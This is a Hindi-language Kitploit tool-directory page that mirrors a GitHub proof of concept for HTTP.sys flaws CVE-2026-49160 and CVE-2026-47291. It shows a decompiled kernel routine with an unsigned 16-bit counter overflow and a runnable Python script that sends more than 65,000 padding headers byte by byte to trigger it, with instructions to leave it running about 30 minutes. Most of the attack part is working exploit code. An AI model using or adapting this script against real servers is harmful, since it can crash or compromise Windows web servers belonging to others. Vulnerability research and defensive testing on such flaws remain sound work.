Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/dhmosfunk/cve-2026-49160-cve-2026-47291-http.sys
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंग
GitHubdhmosfunk/cve-2026-49160-cve-2026-47291-http.sys

CVE-2026-49160-CVE-2026-47291-HTTP.sys

HTTP.sys सेवा अस्वीकार भेद्यता और HTTP.sys दूरस्थ कोड निष्पादन भेद्यता

रिपॉजिटरी देखें

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
522 महीने पहलेअभी तक समीक्षित नहीं

CVE-2026-49160 और CVE-2026-47291 HTTP.sys PoC

HTTP.sys सेवा अस्वीकार भेद्यता
HTTP.sys दूरस्थ कोड निष्पादन भेद्यता

GitHub की फ़ाइल आकार सीमाओं के कारण, इस PoC (CVE-2026-49160) के प्रदर्शन वीडियो Releases में अटैचमेंट के रूप में होस्ट किए गए हैं।

CVE-2026-47291

भेद्य कोड:

root@kitploit:~
 if ((DAT_0 & 1) != 0) {
            local_e8 = *(int **)(piVar16 + 0x10);
            local_e0 = (char *)ppuVar3;
            WPP_SF_qII(0x408,0x10b,&WPP_35392aa6288d35088b5e7b5e64cc7a3b_Traceguids,piVar16);
          }
          if (*(ushort *)((longlong)piVar16 + 0x642) < *(ushort *)(piVar16 + 400)) {
LAB_8:
            ppuVar1 = ppuVar3 + 4;
            *(undefined ***)
             (*(longlong *)(piVar16 + 0x192) + (ulonglong)*(ushort *)((longlong)piVar16 + 0x642) * 8
             ) = ppuVar3;
            *(short *)((longlong)piVar16 + 0x642) = *(short *)((longlong)piVar16 + 0x642) + 1;
            LOCK();
            iVar10 = *(int *)ppuVar1;
            *(int *)ppuVar1 = *(int *)ppuVar1 + 1;
            UNLOCK();
            if ((UxDebugCheckRefcount != '\0') && (iVar10 + 1 < 0)) {
              UlBugCheckEx(3,ppuVar1,10,(longlong)(iVar10 + 1));
              pcVar4 = (code *)swi(3);
              (*pcVar4)();
              return;
            }
            cVar6 = '\x01';
          }
          else {
            local_e8 = (int *)CONCAT44(local_e8._4_4_,1);
            _Dst = (void *)ExAllocatePool3(0x42,(ulonglong)*(ushort *)(piVar16 + 400) * 8 + 0x28,
                                           0x52526c55,&UxLowPriorityPool);
            if (_Dst != (void *)0x0) {
              memmove(_Dst,*(void **)(piVar16 + 0x192),
                      (ulonglong)*(ushort *)((longlong)piVar16 + 0x642) << 3);
              if (1 < *(ushort *)(piVar16 + 400)) {
                ExFreePoolWithTag(*(undefined8 *)(piVar16 + 0x192),0);
              }
              *(short *)(piVar16 + 400) = (short)piVar16[400] + 5; <- unsigned short 16bit
              *(void **)(piVar16 + 0x192) = _Dst;
              goto LAB_8;
            }
          }
          if ((DAT_0 & 1) != 0) {
            WPP_SF_D(0x408,0x10c,&WPP_35392aa6288d35088b5e7b5e64cc7a3b_Traceguids,cVar6);
          }

यह कोड

root@kitploit:~
import socket, ssl, time

ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE

raw_sock = socket.create_connection(("hello.lab", 443))
s = ctx.wrap_socket(raw_sock, server_hostname="hello.lab")
s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)

request = b"GET / HTTP/1.1\r\nHost: hello.lab\r\nConnection: keep-alive\r\n"
for i in range(0xFFFF+2):
    request += f"X-Pad-{i}: value{i}\r\n".encode()
request += b"\r\n"

for b in request:
    s.send(bytes([b]))

try:
    response = s.recv(4096)
    print(response)
except ConnectionResetError as e:
    print("Connection reset:", e)

print("Connection held open. Press Ctrl+C to close.")
try:
    while True:
        time.sleep(1)
except KeyboardInterrupt:
    print("Closing.")
    s.close()

काउंटर मान को +5 बढ़ाता है।

स्क्रिप्ट को लगभग 30 मिनट तक चलने दें क्योंकि प्रत्येक बफर प्राप्त होने पर काउंटर +5 बढ़ता है...

ट्रिगर किया गया ओवरफ़्लो चित्र

डिबगर में काउंटर: चित्र

टूल डाउनलोड करें